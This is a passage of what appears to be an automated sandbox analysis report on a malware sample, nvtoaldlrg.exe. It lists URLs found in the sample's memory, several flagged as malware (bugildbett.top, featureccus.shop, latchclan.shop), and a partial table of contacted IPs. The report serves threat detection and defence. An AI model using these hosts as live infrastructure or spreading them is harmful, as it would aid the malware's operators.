                                                                                                                            https://steamcommunity.com:443/profiles/76561199822375128nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://guntac.bet/nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://lv.queniujq.cnnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brnvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.youtube.com/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://store.steampowered.com/privacy_agreement/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://bugildbett.top:443/bAuzaMicrosoftnvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown
                                                                                                                                        https://steamcommunity.com/-Mnvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://steamcommunity.com/%Mnvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/recaptcha/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://checkout.steampowered.com/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.enigmaprotector.com/nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://gemini.google.com/app?q=nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/;nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/about/nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/EBnvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamloopback.hostnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/profiles/76561199822375128Onvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://help.steampowered.com/en/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/market/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/news/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.enigmaprotector.com/openUnvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/profiles/76561199822375128envtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgnvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://featureccus.shop:443/bdMAnnvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://recaptcha.net/recaptcha/;nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199822375128.36_nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=ennvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/discussions/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/MBnvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=39xCnvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.iconvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://steamcommunity.com/profiles/76561199822375128mBnvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/stats/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_cnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://medal.tvnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://broadcast.st.dl.eccdnx.comnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&anvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://citydisco.bet/gdnvtoaldlrg.exe, 00000000.00000003.923936426.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://steamcommunity.com/Fnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://x1.c.lencr.org/0nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://x1.i.lencr.org/0nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://latchclan.shop:443/Wjquwnvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          104.21.48.1
                                                                                                                                                                                                                          		htardwarehu.icuUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          104.21.16.1
                                                                                                                                                                                                                          		bugildbett.topUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          188.114.97.3
                                                                                                                                                                                                                          		jowinjoinery.icuEuropean Union
